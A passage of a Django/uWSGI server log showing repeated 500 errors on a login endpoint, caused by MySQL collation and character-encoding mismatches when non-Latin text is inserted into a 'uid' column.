"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 89/142] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 101 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 90/143] 219.228.146.146 () {48 vars in 970 bytes} [Thu Jan 14 07:44:19 2021] POST /login/ => generated 209531 bytes in 103 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 91/144] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:27 2021] POST /login/ => generated 209413 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 93/145] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:27 2021] POST /login/ => generated 209413 bytes in 148 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 94/146] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:28 2021] POST /login/ => generated 209413 bytes in 159 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 94/147] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:28 2021] POST /login/ => generated 209413 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File 